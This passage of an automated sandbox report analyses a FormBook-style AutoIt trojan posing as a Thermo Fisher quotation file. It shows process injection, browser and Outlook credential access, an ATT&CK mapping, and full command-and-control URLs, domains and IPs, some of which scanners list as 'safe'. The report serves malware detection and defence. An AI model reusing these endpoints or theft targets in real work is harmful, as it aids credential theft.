                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mobsync.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\mobsync.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread register set: target process: 5240
                Source: C:\Windows\SysWOW64\mobsync.exe | Thread APC queued: target process: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FF1008
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0063B106 LogonUserW, | 0_2_0063B106
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00603D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00603D19
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0064411C SendInput,keybd_event, | 0_2_0064411C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_006474E7 mouse_event, | 0_2_006474E7
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe"
                Source: C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe | Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                Source: C:\Windows\SysWOW64\mobsync.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0063A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_0063A66C
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_006471FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 0_2_006471FA
                Source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000000.2350230515.0000000001571000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000000.2350230515.0000000001571000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197575459.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903215967.0000000000C71000.00000002.00000001.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000000.2350230515.0000000001571000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_006265C4 cpuid | 0_2_006265C4
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0065091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW, | 0_2_0065091D
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0067B340 GetUserNameW, | 0_2_0067B340
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00631E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 0_2_00631E8E
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0061DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_0061DDC0

                Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\mobsync.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mobsync.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: WIN_81
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: WIN_XP
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: WIN_XPe
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: WIN_VISTA
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: WIN_7
Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Binary or memory string: WIN_8

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_00658C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00658C4F
Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Code function: 0_2_0065923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_0065923B
MITRE ATT&CK Matrix, listed by tactic column (leading digits are the signature counts displayed in each matrix cell)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 3 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 251 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 5 Ingress Tool Transfer; 1 Encrypted Channel; 5 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph

Behavior Graph ID: 1559710
Sample: Thermo Fisher Scientific - ...
Start date: 20/11/2024
Architecture: WINDOWS
Score: 100

Start
    Network: www.tals.xyz; www.logidant.xyz (Performs DNS queries to domains with low reputation); 11 other IPs or domains
    Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures
    started: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe 2
        Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
        started: svchost.exe
            Signatures: Maps a DLL or memory area into another process
            injected: uxnRAYhIPZRPiA.exe
                Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                started: mobsync.exe 13
                    Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                    started: firefox.exe
                    injected: uxnRAYhIPZRPiA.exe
                        Network: logidant.xyz 45.141.156.114, ports 49938, 49945, 49952, YURTEH-ASUA, Germany; www.izmirescortg.xyz 104.21.36.62, ports 49748, 80, CLOUDFLARENETUS, United States; 8 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)

Source | Detection | Scanner | Label | Link
Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | 42% | ReversingLabs | Win32.Trojan.AutoitInject
Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.logidant.xyz/iuvu/ | 0% | Avira URL Cloud | safe
http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY5hB0FWQM1VzVFsJbVN+4NwIpTlqvPWS8Sl4p5VjB9j49JCBEhVmvR6biJ/0AaWeg==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/g3h7/?sVC8z=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.yunlekeji.top/t322/?PPP=FHWL56&sVC8z=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== | 0% | Avira URL Cloud | safe
http://www.brightvision.website/gn26/?sVC8z=fgpTVhEuh+HnR3p0lfNLmVuUqPxSLN4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd7NMKGX1gMLgBVaz3e9231X82jxOqgG++QmJ2h2W7Ejj4Gw==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.madhf.tech/0mwe/?sVC8z=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwRcIvXs05Ha3jXYoQpxdY | 0% | Avira URL Cloud | safe
http://www.zkdamdjj.shop/kf1m/ | 0% | Avira URL Cloud | safe
http://www.tals.xyz/k1td/ | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/g3h7/ | 0% | Avira URL Cloud | safe
http://aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a | 0% | Avira URL Cloud | safe
http://www.brightvision.website | 0% | Avira URL Cloud | safe
https://zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB | 0% | Avira URL Cloud | safe
http://www.logidant.xyz/iuvu/?sVC8z=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.aballanet.cat/6xrr/?sVC8z=HxJAUmNG5a+243k7lB56qNhkSq7m2edDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBWZyS1GVQka4TzLjh3pjJtHZ6h8tdWKE4MgApWPfIsL675g==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.thinkphp.cn | 0% | Avira URL Cloud | safe
http://www.aballanet.cat/6xrr/ | 0% | Avira URL Cloud | safe
http://www.izmirescortg.xyz/lnl7/?sVC8z=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgfVGx56k02tXkAzZldWa3Ro5vlhsr06JocjtffJpgas7XnA==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.laohub10.net/36be/ | 0% | Avira URL Cloud | safe
http://www.laohub10.net/36be/?sVC8z=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.zkdamdjj.shop/kf1m/?sVC8z=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoRPOyc9x0vhFbku7Ub3qNJZbDXed1slXSq/MHP91YwZ61FA==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.tals.xyz/k1td/?sVC8z=oEMxw+ab8QlEZmTmAbDEuuFmAVWx5xMHQHNpbkBMxCjDr7HlodnZgfFsQKGKkvz/XYzpvPMYep3+sZsYYHcCVG2YOA5cLjPPS3bUYxhUJeAm1ae/P1TsW9+p+FqZ3lrXmQ==&PPP=FHWL56 | 0% | Avira URL Cloud | safe
http://www.canadavinreport.site/g3h7/?sVC8z=dyqW | 0% | Avira URL Cloud | safe
http://www.madhf.tech/0mwe/ | 0% | Avira URL Cloud | safe
http://www.brightvision.website/gn26/ | 0% | Avira URL Cloud | safe
http://www.yunlekeji.top/t322/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.izmirescortg.xyz | 104.21.36.62 | active: true | malicious: true | reputation: unknown
